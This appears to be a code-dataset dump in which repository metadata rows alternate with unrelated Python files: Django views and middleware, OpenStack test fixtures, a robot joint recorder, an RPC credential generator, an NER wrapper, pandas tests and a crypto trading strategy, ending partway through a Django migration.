| false | false | 674 |
py
|
from django.shortcuts import render, redirect
from testing_app.forms.profile import ProfileForm
from testing_app.models import Profile
def index(request):
if request.method == 'GET':
context = {
'profiles': Profile.objects.all(),
'form': ProfileForm(),
}
return render(request, 'testing/index.html', context)
else:
form = ProfileForm(request.POST)
if form.is_valid():
form.save()
return redirect('profiles')
context = {
'profiles': Profile.objects.all(),
'form': form,
}
return render(request, 'testing/index.html', context)
|
[
"[email protected]"
] | |
b1baa37ccc2300a62d8d9375b75162e34c2989df
|
5a281cb78335e06c631181720546f6876005d4e5
|
/openstack-placement-1.0.0/placement/tests/fixtures.py
|
be235b355a8c4dee2334904091ad0f96969adaab
|
[
"Apache-2.0"
] |
permissive
|
scottwedge/OpenStack-Stein
|
d25b2a5bb54a714fc23f0ff0c11fb1fdacad85e8
|
7077d1f602031dace92916f14e36b124f474de15
|
refs/heads/master
| 2021-03-22T16:07:19.561504 | 2020-03-15T01:31:10 | 2020-03-15T01:31:10 | 247,380,811 | 0 | 0 |
Apache-2.0
| 2020-03-15T01:24:15 | 2020-03-15T01:24:15 | null |
UTF-8
|
Python
| false | false | 3,272 |
py
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Fixtures for Placement tests."""
from __future__ import absolute_import
from oslo_config import cfg
from oslo_db.sqlalchemy import test_fixtures
from placement.db.sqlalchemy import migration
from placement import db_api as placement_db
from placement import deploy
from placement.objects import resource_class
from placement.objects import trait
from placement import resource_class_cache as rc_cache
class Database(test_fixtures.GeneratesSchema, test_fixtures.AdHocDbFixture):
def __init__(self, conf_fixture, set_config=False):
"""Create a database fixture."""
super(Database, self).__init__()
if set_config:
try:
conf_fixture.register_opt(
cfg.StrOpt('connection'), group='placement_database')
except cfg.DuplicateOptError:
# already registered
pass
conf_fixture.config(connection='sqlite://',
group='placement_database')
self.conf_fixture = conf_fixture
self.get_engine = placement_db.get_placement_engine
placement_db.configure(self.conf_fixture.conf)
def get_enginefacade(self):
return placement_db.placement_context_manager
def generate_schema_create_all(self, engine):
# note: at this point in oslo_db's fixtures, the incoming
# Engine has **not** been associated with the global
# context manager yet.
migration.create_schema(engine)
# so, to work around that placement's setup code really wants to
# use the enginefacade, we will patch the engine into it early.
# oslo_db is going to patch it anyway later. So the bug in oslo.db
# is that code these days really wants the facade to be set up fully
# when it's time to create the database. When oslo_db's fixtures
# were written, enginefacade was not in use yet so it was not
# anticipated that everyone would be doing things this way
_reset_facade = placement_db.placement_context_manager.patch_engine(
engine)
self.addCleanup(_reset_facade)
# Make sure db flags are correct at both the start and finish
# of the test.
self.addCleanup(self.cleanup)
self.cleanup()
# Sync traits and resource classes.
deploy.update_database(self.conf_fixture.conf)
def cleanup(self):
trait._TRAITS_SYNCED = False
resource_class._RESOURCE_CLASSES_SYNCED = False
rc_cache.RC_CACHE = None
|
[
"Wayne [email protected]"
] |
Wayne [email protected]
|
393ccdde7ef08c546deeb32ee7f792b458c689fa
|
a63419b2c457a219c010876ece3980af8cfc3c1b
|
/_DJANGO_/django-player/gameplay/views.py
|
556971862e1019a0cf46647d9fb7fb1688c69685
|
[] |
no_license
|
thomasm1/python_2018
|
ba87560a1e25343c0429fcafe51bb867dc299223
|
6a57c7603055a2511a8734ab34ce21f76e4427ef
|
refs/heads/master
| 2023-05-10T07:20:07.911734 | 2023-05-05T03:58:36 | 2023-05-05T03:58:36 | 147,065,041 | 2 | 5 | null | 2023-03-03T15:15:08 | 2018-09-02T07:41:32 |
Rich Text Format
|
UTF-8
|
Python
| false | false | 1,150 |
py
|
from django.shortcuts import render, get_object_or_404, redirect
from django.contrib.auth.decorators import login_required
from django.core.exceptions import PermissionDenied
from django.views.generic import ListView
from .models import Game
from .forms import MoveForm
@login_required()
def game_detail(request, id):
game = get_object_or_404(Game, pk=id)
context = {'game': game }
if game.is_users_move(request.user):
context['form'] = MoveForm()
return render(request,
"gameplay/game_detail.html",
context
)
@login_required()
def make_move(request, id):
game = get_object_or_404(Game, pk=id)
if not game.is_users_move(request.user):
raise PermissionDenied
move = game.new_move()
form = MoveForm(instance=move, data=request.POST)
if form.is_valid():
move.save()
return redirect("gameplay_detail", id)
else:
return render(request,
"gameplay/game_detail.html",
{'game': game, 'form': form}
)
class AllGamesList(ListView):
model = Game
|
[
"[email protected]"
] | |
e1eca6386c795d0c9133574f9c9d774114791f16
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/exercism_data/python/word-count/5cf7181856df4d0a963c76fedfbdd36a.py
|
f9930a4d6aa5f919c9e249a5f9a7b5e2abcc8d31
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null |
UTF-8
|
Python
| false | false | 908 |
py
|
"""Word Counting."""
from collections import Counter
import re
import string
# A regular expression that matches any punctuation character.
PUNCTUATION_REGEX = re.compile("[{}]".format(re.escape(string.punctuation)))
class Phrase(str):
"""A subclass of str that supports word counting."""
def __init__(self, phrase=''):
super(Phrase, self).__init__(phrase)
self._counter = None
def __repr__(self):
return "{!s}({!r})".format(self.__class__.__name__, str(self))
def word_count(self):
"""Return a word frequency dictionary.
A word is delimited by runs of consecutive whitespace or punctuation.
"""
if self._counter is None:
punctuation_erased = re.sub(PUNCTUATION_REGEX, ' ', self)
self._counter = Counter(
word.lower() for word in punctuation_erased.split())
return self._counter
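# Illustrative behaviour (example not from the original file):
#   Phrase("Hello, hello world!").word_count() -> Counter({'hello': 2, 'world': 1})
# Punctuation is replaced by spaces first, then words are lowercased and counted;
# the Counter is cached after the first call.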
|
[
"[email protected]"
] | |
88441b7e0974e4fc5de5bd965e9a9ad800acd21e
|
c7dfacea4969b4fef264429e7c21d6c2d4c932b4
|
/src/baxter_examples/src/baxter_examples/recorder.py
|
032f365f567755301f351b69f2b1e7a75a832475
|
[
"BSD-2-Clause"
] |
permissive
|
DeepBlue14/arm_wkspc
|
697944c72be9a8efaf97a84b6c26a84ebc8de3a6
|
04009550321868722d207924eed3609be7f54882
|
refs/heads/master
| 2020-03-21T10:10:05.644158 | 2018-06-23T23:16:40 | 2018-06-23T23:16:40 | 138,436,686 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,350 |
py
|
# Copyright (c) 2013-2014, Rethink Robotics
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the Rethink Robotics nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import rospy
import baxter_interface
from baxter_interface import CHECK_VERSION
class JointRecorder(object):
def __init__(self, filename, rate):
"""
Records joint data to a file at a specified rate.
"""
self._filename = filename
self._raw_rate = rate
self._rate = rospy.Rate(rate)
self._start_time = rospy.get_time()
self._done = False
self._limb_left = baxter_interface.Limb("left")
self._limb_right = baxter_interface.Limb("right")
self._gripper_left = baxter_interface.Gripper("left", CHECK_VERSION)
self._gripper_right = baxter_interface.Gripper("right", CHECK_VERSION)
self._io_left_lower = baxter_interface.DigitalIO('left_lower_button')
self._io_left_upper = baxter_interface.DigitalIO('left_upper_button')
self._io_right_lower = baxter_interface.DigitalIO('right_lower_button')
self._io_right_upper = baxter_interface.DigitalIO('right_upper_button')
# Verify Grippers Have No Errors and are Calibrated
if self._gripper_left.error():
self._gripper_left.reset()
if self._gripper_right.error():
self._gripper_right.reset()
if (not self._gripper_left.calibrated() and
self._gripper_left.type() != 'custom'):
self._gripper_left.calibrate()
if (not self._gripper_right.calibrated() and
self._gripper_right.type() != 'custom'):
self._gripper_right.calibrate()
def _time_stamp(self):
return rospy.get_time() - self._start_time
def stop(self):
"""
Stop recording.
"""
self._done = True
def done(self):
"""
Return whether or not recording is done.
"""
if rospy.is_shutdown():
self.stop()
return self._done
def record(self):
"""
        Record the current joint positions to a CSV file.

        If a filename was provided at construction, this records the latest set
        of joint angles in CSV format. It does not check whether the file
        already exists and will overwrite existing files.
"""
if self._filename:
joints_left = self._limb_left.joint_names()
joints_right = self._limb_right.joint_names()
with open(self._filename, 'w') as f:
f.write('time,')
f.write(','.join([j for j in joints_left]) + ',')
f.write('left_gripper,')
f.write(','.join([j for j in joints_right]) + ',')
f.write('right_gripper\n')
while not self.done():
# Look for gripper button presses
if self._io_left_lower.state:
self._gripper_left.open()
elif self._io_left_upper.state:
self._gripper_left.close()
if self._io_right_lower.state:
self._gripper_right.open()
elif self._io_right_upper.state:
self._gripper_right.close()
angles_left = [self._limb_left.joint_angle(j)
for j in joints_left]
angles_right = [self._limb_right.joint_angle(j)
for j in joints_right]
f.write("%f," % (self._time_stamp(),))
f.write(','.join([str(x) for x in angles_left]) + ',')
f.write(str(self._gripper_left.position()) + ',')
f.write(','.join([str(x) for x in angles_right]) + ',')
f.write(str(self._gripper_right.position()) + '\n')
self._rate.sleep()
|
[
"[email protected]"
] | |
94b0a380ce4543b547a5176caef0e9ce5901f3ca
|
ad71b2aaab2bf1127f40fef008ac6f6d1334c32c
|
/share/rpcauth/rpcauth.py
|
219286929731362f0553450cf62c1d98e5fd84b4
|
[
"MIT"
] |
permissive
|
minblock/carpaticoin
|
00eb755770f370d54d73ae9b227e4d4bbd60babb
|
f65cf89970b36a073b49435a3833a2a83a7f2145
|
refs/heads/master
| 2021-05-22T01:38:29.187393 | 2020-04-04T04:41:16 | 2020-04-04T04:41:16 | 252,909,819 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,579 |
py
|
#!/usr/bin/env python3
# Copyright (c) 2015-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from argparse import ArgumentParser
from base64 import urlsafe_b64encode
from binascii import hexlify
from getpass import getpass
from os import urandom
import hmac
def generate_salt(size):
"""Create size byte hex salt"""
return hexlify(urandom(size)).decode()
def generate_password():
"""Create 32 byte b64 password"""
return urlsafe_b64encode(urandom(32)).decode('utf-8')
def password_to_hmac(salt, password):
m = hmac.new(bytearray(salt, 'utf-8'), bytearray(password, 'utf-8'), 'SHA256')
return m.hexdigest()
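# Sketch of the matching verification step (assumption; not part of this script):
# a server that stored rpcauth=<user>:<salt>$<hmac> recomputes the HMAC from the
# candidate password and compares.
#
#   salt, stored_hmac = auth_part.split('$')
#   ok = password_to_hmac(salt, candidate_password) == stored_hmac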
def main():
parser = ArgumentParser(description='Create login credentials for a JSON-RPC user')
parser.add_argument('username', help='the username for authentication')
parser.add_argument('password', help='leave empty to generate a random password or specify "-" to prompt for password', nargs='?')
args = parser.parse_args()
if not args.password:
args.password = generate_password()
elif args.password == '-':
args.password = getpass()
# Create 16 byte hex salt
salt = generate_salt(16)
password_hmac = password_to_hmac(salt, args.password)
print('String to be appended to carpaticoin.conf:')
print('rpcauth={0}:{1}${2}'.format(args.username, salt, password_hmac))
print('Your password:\n{0}'.format(args.password))
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
6ab3e1a39cd93671912027393c5a68e9026211cb
|
7941390ad02fca9f8c66ceaf1d71a9fd0815f50e
|
/simple_NER/annotators/remote/allenai.py
|
b54499e860da539887f6b0098ac177a14e67b49b
|
[
"MIT"
] |
permissive
|
msgpo/simple_NER
|
08cde36758f1d97560c3db9e36918a7e4abe08dd
|
5eaed615d9075d879e4b2af461f2e99acc0f9e68
|
refs/heads/master
| 2022-04-19T13:07:56.507469 | 2020-04-12T18:43:42 | 2020-04-12T18:43:42 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,620 |
py
|
from simple_NER.annotators import NERWrapper
from simple_NER import Entity
import requests
def allen_NER(text, host):
url = host + "named-entity-recognition"
data = {"sentence": text}
return requests.post(url, json=data).json()
class AllenNlpNER(NERWrapper):
def __init__(self, host="http://demo.allennlp.org/predict/"):
super().__init__()
self.host = host
self.add_detector(self.annotate)
def annotate(self, text):
res = allen_NER(text, self.host)
tags = res["tags"]
words = res["words"]
for idx, tag in enumerate(tags):
if tag != 'O':
yield Entity(words[idx], tag, source_text=text)
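    # Tag strings appear to follow the BILOU scheme ('U-LOC' in the asserts
    # below is a unit-length location span); 'O' marks tokens outside any
    # entity and is filtered out above.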
if __name__ == "__main__":
ner = AllenNlpNER()
ents = [r for r in
ner.extract_entities("Lisbon is the capital of Portugal")]
assert ents[0].as_json() == {'confidence': 1,
'data': {},
'entity_type': 'U-LOC',
'rules': [],
'source_text': 'Lisbon is the capital of Portugal',
'spans': [(0, 6)],
'value': 'Lisbon'}
assert ents[1].as_json() == {'confidence': 1,
'data': {},
'entity_type': 'U-LOC',
'rules': [],
'source_text': 'Lisbon is the capital of Portugal',
'spans': [(25, 33)],
'value': 'Portugal'}
|
[
"[email protected]"
] | |
3dd267f794d2b0b929fd7ea3529b59d9507ba38a
|
a3cc7286d4a319cb76f3a44a593c4a18e5ddc104
|
/lib/surface/app/__init__.py
|
9826abe1d2a81963769b6af01ae5ebf38641f8f6
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
jordanistan/Google-Cloud-SDK
|
f2c6bb7abc2f33b9dfaec5de792aa1be91154099
|
42b9d7914c36a30d1e4b84ae2925df7edeca9962
|
refs/heads/master
| 2023-09-01T01:24:53.495537 | 2023-08-22T01:12:23 | 2023-08-22T01:12:23 | 127,072,491 | 0 | 1 |
NOASSERTION
| 2023-08-22T01:12:24 | 2018-03-28T02:31:19 |
Python
|
UTF-8
|
Python
| false | false | 2,758 |
py
|
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The gcloud app group."""
from googlecloudsdk.calliope import base
DETAILED_HELP = {
'brief': 'Manage your App Engine deployments.',
'DESCRIPTION': """
The gcloud app command group lets you deploy and manage your Google App
Engine apps. These commands replace their equivalents in the appcfg
tool.
App Engine is a platform for building scalable web applications
and mobile backends. App Engine provides you with built-in services and
APIs such as NoSQL datastores, memcache, and a user authentication API,
common to most applications.
More information on App Engine can be found here:
https://cloud.google.com/appengine and detailed documentation can be
found here: https://cloud.google.com/appengine/docs/
""",
'EXAMPLES': """\
To run your app locally in the development application server
to simulate your application running in production App Engine with
sandbox restrictions and services provided by App Engine SDK libraries,
use the `dev_appserver.py` command and your app's `app.yaml`
configuration file to run:
$ dev_appserver.py ~/my_app/app.yaml
For an in-depth look into using the local development server, follow
        this guide: https://cloud.google.com/appengine/docs/standard/python/tools/using-local-server.
To deploy the code and configuration of your app to the App Engine
server, run:
$ {command} deploy ~/my_app/app.yaml
To list all versions of all services of your existing deployments, run:
$ {command} versions list
To generate all relevant config files for `~/my_app` (or emit an error
message if the directory contents are not recognized), run:
$ {command} gen-config ~/my_app
"""
}
@base.ReleaseTracks(base.ReleaseTrack.ALPHA,
base.ReleaseTrack.BETA,
base.ReleaseTrack.GA)
class AppengineGA(base.Group):
def Filter(self, context, args):
del context, args
base.DisableUserProjectQuota()
AppengineGA.detailed_help = DETAILED_HELP
|
[
"[email protected]"
] | |
541e28ec93c85cc1adc61eecd87bdde2a641136b
|
c91d029b59f4e6090a523bf571b3094e09852258
|
/src/utils/middlewares.py
|
64ca375d393cdaff4d003588764a00f79181c0a1
|
[
"MIT"
] |
permissive
|
anselmobd/fo2
|
d51b63ebae2541b00af79448ede76b02638c41f0
|
8e7f8f3d9a296c7da39d0faf38a266e9c6c162ab
|
refs/heads/master
| 2023-08-31T19:59:33.964813 | 2023-08-31T19:50:53 | 2023-08-31T19:50:53 | 92,856,677 | 1 | 0 |
MIT
| 2023-04-21T21:50:46 | 2017-05-30T17:04:27 |
Python
|
UTF-8
|
Python
| false | false | 2,927 |
py
|
import re
import threading
from django.conf import settings
from django.http import HttpResponse
from django.shortcuts import redirect
from geral.functions import is_alternativa
from utils.functions import get_client_ip
request_cfg = threading.local()
try:
from django.utils.deprecation import MiddlewareMixin
except ImportError:
MiddlewareMixin = object
from .classes import LoggedInUser, AcessoInterno
class LoggedInUserMiddleware(MiddlewareMixin):
'''
Insert this middleware after
django.contrib.auth.middleware.AuthenticationMiddleware
'''
def process_request(self, request):
'''
        Return None so the request continues through the middleware stack.
'''
logged_in_user = LoggedInUser()
logged_in_user.set_user(request)
return None
class NeedToLoginOrLocalMiddleware(object):
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
user_ip = get_client_ip(request)
authenticated_by_ip = False
for ip in settings.N2LOL_ALLOWED_IP_BLOCKS:
if re.compile(ip).match(user_ip) is not None:
authenticated_by_ip = True
break
acesso_interno = AcessoInterno()
acesso_interno.set_interno(authenticated_by_ip)
acesso_interno.set_ip(user_ip)
if request.user.is_authenticated:
return self.get_response(request)
if authenticated_by_ip:
return self.get_response(request)
user_url = request.META['PATH_INFO']
for url in settings.N2LOL_ALLOWED_URLS:
if re.compile(url).match(user_url) is not None:
return self.get_response(request)
return redirect(settings.N2LOL_REDIRECT)
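# Settings consumed above (names from this file; the values shown are
# illustrative assumptions only):
#
#   N2LOL_ALLOWED_IP_BLOCKS = [r'^127\.0\.0\.1$', r'^10\.']
#   N2LOL_ALLOWED_URLS = [r'^/accounts/login/']
#   N2LOL_REDIRECT = '/accounts/login/'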
class AlterRouterMiddleware:
"""
Based on
https://gist.github.com/gijzelaerr/7a3130c494215a0dd9b2/
    The alternative DB router middleware.
    Before the view runs, it sets some context from the URL into thread-local
    storage; after the view, it deletes that context.
In between, any database operation will call the router, which checks for
the thread local storage and returns an appropriate database alias.
Add this to your middleware, for example:
MIDDLEWARE += ['utils.middlewares.AlterRouterMiddleware']
"""
def __init__(self, get_response):
self.get_response = get_response
# One-time configuration and initialization.
def __call__(self, request):
# Code to be executed for each request before
# the view (and later middleware) are called.
request_cfg.alter_db = is_alternativa(request)
request.alter_db = request_cfg.alter_db
response = self.get_response(request)
# Code to be executed for each request/response after
# the view is called.
if hasattr(request_cfg, 'alter_db'):
del request_cfg.alter_db
return response
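# A database router that consumes the thread-local flag set above would look
# roughly like this (hypothetical sketch; the project's real router is not in
# this file):
#
#   class AlterRouter:
#       def db_for_read(self, model, **hints):
#           if getattr(request_cfg, 'alter_db', False):
#               return 'alternative'   # alias name is an assumption
#           return None                # None falls through to 'default'
#       db_for_write = db_for_read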
|
[
"[email protected]"
] | |
f3e46e8de53108b8175863fac2003556b51fdbdc
|
5dc393ffb3d65094d2c4f6bc8b9980e2fc167670
|
/pandas/stats/tests/test_fama_macbeth.py
|
f48dde20f138ac2a2f78bf479e668b579e96ac1f
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
JWCornV/pandas
|
913db2a34cb9f9820f986412e9c3cf868ecef24d
|
6078fba9410918baa486ca008cc9e3ba066c03ec
|
refs/heads/master
| 2020-12-25T10:14:13.384789 | 2012-06-27T17:10:54 | 2012-06-27T17:10:54 | 4,813,052 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,022 |
py
|
from pandas import DataFrame, Panel
from pandas.stats.api import fama_macbeth
from common import assert_almost_equal, BaseTest
import numpy as np
class TestFamaMacBeth(BaseTest):
def testFamaMacBethRolling(self):
# self.checkFamaMacBethExtended('rolling', self.panel_x, self.panel_y,
# nw_lags_beta=2)
# df = DataFrame(np.random.randn(50, 10))
x = dict((k, DataFrame(np.random.randn(50, 10))) for k in 'abcdefg')
x = Panel.from_dict(x)
y = (DataFrame(np.random.randn(50, 10)) +
DataFrame(0.01 * np.random.randn(50, 10)))
self.checkFamaMacBethExtended('rolling', x, y, nw_lags_beta=2)
self.checkFamaMacBethExtended('expanding', x, y, nw_lags_beta=2)
def checkFamaMacBethExtended(self, window_type, x, y, **kwds):
window = 25
result = fama_macbeth(y=y, x=x, window_type=window_type, window=window,
**kwds)
self._check_stuff_works(result)
index = result._index
time = len(index)
for i in xrange(time - window + 1):
if window_type == 'rolling':
start = index[i]
else:
start = index[0]
end = index[i + window - 1]
x2 = {}
for k, v in x.iteritems():
x2[k] = v.truncate(start, end)
y2 = y.truncate(start, end)
reference = fama_macbeth(y=y2, x=x2, **kwds)
assert_almost_equal(reference._stats, result._stats[:, i])
static = fama_macbeth(y=y2, x=x2, **kwds)
self._check_stuff_works(static)
def _check_stuff_works(self, result):
# does it work?
attrs = ['mean_beta', 'std_beta', 't_stat']
for attr in attrs:
getattr(result, attr)
# does it work?
result.summary
if __name__ == '__main__':
import nose
nose.runmodule(argv=[__file__,'-vvs','-x','--pdb', '--pdb-failure'],
exit=False)
|
[
"[email protected]"
] | |
7dbb8959b233092833590760e034f6ebe7360014
|
1065a2782e4947b5bf14ec4536e4ad7addc7aec3
|
/strategy/cryptoalpha/casubc.py
|
f4bb09a5cb12cc696d58f6af909445370b6e56b8
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
Johannesduvenage/siis
|
0bf6875d4a5f3638cadb01ed5541aab29ba1d77a
|
57e537cf9b6a71c8ad0b3bb0759772d126496a17
|
refs/heads/master
| 2020-09-10T21:51:56.814014 | 2019-11-13T23:57:34 | 2019-11-13T23:57:34 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,900 |
py
|
# @date 2018-08-24
# @author Frederic SCHERMA
# @license Copyright (c) 2018 Dream Overflow
# Crypto Alpha strategy, sub-strategy C.
from strategy.indicator import utils
from strategy.strategysignal import StrategySignal
from monitor.streamable import StreamMemberFloatSerie, StreamMemberSerie, StreamMemberFloatBarSerie, StreamMemberOhlcSerie
from .casub import CryptoAlphaStrategySub
import logging
logger = logging.getLogger('siis.strategy.cryptoalpha')
class CryptoAlphaStrategySubC(CryptoAlphaStrategySub):
"""
Crypto Alpha strategy, sub-strategy C.
"""
def __init__(self, strategy_trader, params):
super().__init__(strategy_trader, params)
self.rsi_low = params['constants']['rsi_low']
self.rsi_high = params['constants']['rsi_high']
def process(self, timestamp):
candles = self.get_candles()
if len(candles) < self.depth:
            # not enough samples
return
last_timestamp = candles[-1].timestamp
prices = self.price.compute(last_timestamp, candles)
volumes = self.volume.compute(last_timestamp, candles)
signal = self.process1(timestamp, last_timestamp, candles, prices, volumes)
        # avoid duplicate signals
if signal and self.need_signal:
# self.last_signal = signal
if (self.last_signal and (signal.signal == self.last_signal.signal) and
(signal.dir == self.last_signal.dir) and
(signal.base_time() == self.last_signal.base_time())): # or (signal.ts - self.last_signal.ts) < (self.tf * 0.5):
# same base time avoid multiple entries on the same candle
signal = None
else:
# retains the last valid signal only if valid
self.last_signal = signal
self.complete(candles)
return signal
def process1(self, timestamp, last_timestamp, candles, prices, volumes):
signal = None
        # volume SMA: increases signal strength when volume rises above its SMA
# volume_sma = utils.MM_n(self.depth-1, self.volume.volumes)
rsi_30_70 = 0 # 1 <30, -1 >70
rsi_40_60 = 0 # 1 if RSI in 40-60
stochrsi_20_80 = 0 # 1 <20, -1 >80
stochrsi_40_60 = 0 # 1 if stochRSI in 40-60
volume_signal = 0
ema_sma_cross = 0
ema_sma_height = 0
if self.rsi:
self.rsi.compute(last_timestamp, prices)
rsi = self.rsi.last
if self.rsi.last < self.rsi_low:
rsi_30_70 = 1.0
elif self.rsi.last > self.rsi_high:
rsi_30_70 = -1.0
if self.rsi.last > 0.4 and self.rsi.last < 0.6:
rsi_40_60 = 1
if self.stochrsi:
self.stochrsi.compute(last_timestamp, prices)
if self.stochrsi.last_k < 0.2:
stochrsi_20_80 = 1.0
elif self.stochrsi.last_k > 0.8:
stochrsi_20_80 = -1.0
if self.stochrsi.last_k > 0.4 and self.stochrsi.last_k < 0.6:
stochrsi_40_60 = 1
# if self.volume.last > volume_sma[-1]:
# volume_signal = 1
# elif self.volume.last < volume_sma[-1]:
# volume_signal = -1
if self.sma and self.ema:
self.sma.compute(last_timestamp, prices)
self.ema.compute(last_timestamp, prices)
# ema over sma crossing
ema_sma_cross = utils.cross((self.ema.prev, self.sma.prev), (self.ema.last, self.sma.last))
if self.ema.last > self.sma.last:
ema_sma_height = 1
elif self.ema.last < self.sma.last:
ema_sma_height = -1
if self.atr:
if self.last_closed:
self.atr.compute(last_timestamp, self.price.high, self.price.low, self.price.close)
if self.pivotpoint:
if self.pivotpoint.compute_at_close and self.last_closed:
self.pivotpoint.compute(last_timestamp, self.price.open, self.price.high, self.price.low, self.price.close)
return signal
def setup_streamer(self, streamer):
streamer.add_member(StreamMemberSerie('begin'))
streamer.add_member(StreamMemberOhlcSerie('ohlc'))
streamer.add_member(StreamMemberFloatSerie('price', 0))
streamer.add_member(StreamMemberFloatBarSerie('volume', 1))
streamer.add_member(StreamMemberFloatSerie('rsi-low', 2))
streamer.add_member(StreamMemberFloatSerie('rsi-high', 2))
streamer.add_member(StreamMemberFloatSerie('rsi', 2))
streamer.add_member(StreamMemberFloatSerie('stochrsi-low', 3))
streamer.add_member(StreamMemberFloatSerie('stochrsi-high', 3))
streamer.add_member(StreamMemberFloatSerie('stochrsi-k', 3))
streamer.add_member(StreamMemberFloatSerie('stochrsi-d', 3))
streamer.add_member(StreamMemberFloatSerie('sma', 0))
streamer.add_member(StreamMemberFloatSerie('ema', 0))
streamer.add_member(StreamMemberFloatSerie('hma', 0))
streamer.add_member(StreamMemberFloatSerie('vwma', 0))
streamer.add_member(StreamMemberFloatSerie('perf', 3))
streamer.add_member(StreamMemberSerie('end'))
streamer.next_timestamp = self.next_timestamp
def stream(self, streamer):
delta = min(int((self.next_timestamp - streamer.next_timestamp) / self.tf) + 1, len(self.price.prices))
for i in range(-delta, 0, 1):
ts = self.price.timestamp[i]
streamer.member('begin').update(ts)
streamer.member('ohlc').update((self.price.open[i], self.price.high[i], self.price.low[i], self.price.close[i]), ts)
streamer.member('price').update(self.price.prices[i], ts)
streamer.member('volume').update(self.volume.volumes[i], ts)
streamer.member('rsi-low').update(self.rsi_low, ts)
streamer.member('rsi-high').update(self.rsi_high, ts)
streamer.member('rsi').update(self.rsi.rsis[i], ts)
# streamer.member('stochrsi-low').update(20, ts)
# streamer.member('stochrsi-high').update(80, ts)
# streamer.member('stochrsi-k').update(self.stochrsi.stochrsis[i], ts)
# streamer.member('stochrsi-d').update(self.stochrsi.stochrsis[i], ts)
streamer.member('sma').update(self.sma.smas[i], ts)
streamer.member('ema').update(self.ema.emas[i], ts)
# streamer.member('hma').update(self.hma.hmas[i], ts)
# streamer.member('vwma').update(self.vwma.vwmas[i], ts)
streamer.member('perf').update(self.strategy_trader._stats['perf']*100, ts)
streamer.member('end').update(ts)
# push per frame
streamer.push()
streamer.next_timestamp = self.next_timestamp
|
[
"[email protected]"
] | |
ba6aeae64431208cbabea1456729c92c602f9921
|
386d5d4f8f102e701d02b326cd066f520e3dff9f
|
/ProjectApplication/project_core/migrations/0163_add_account_number.py
|
b5f637bb6f9f02103a1375f7fd3e3ed9b338b0fa
|
[
"MIT"
] |
permissive
|
Swiss-Polar-Institute/project-application
|
ae2561c3ae2c1d5412d165d959ce2e5886135e0a
|
7dc4a9f7e0f8d28c89977b85f99bc5e35ea77d43
|
refs/heads/master
| 2023-08-31T04:01:23.492272 | 2023-08-25T14:33:02 | 2023-08-25T14:33:02 | 206,330,401 | 7 | 5 |
MIT
| 2023-09-13T08:03:53 | 2019-09-04T13:49:39 |
Python
|
UTF-8
|
Python
| false | false | 2,043 |
py
|
# Generated by Django 3.2 on 2021-04-23 10:25
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('project_core', '0162_callpartfile_proposal_keywords_null'),
]
operations = [
migrations.AddField(
model_name='financialkey',
name='account_number',
field=models.IntegerField(help_text='Code use by the accounting department', null=True, unique=True),
),
migrations.AlterField(
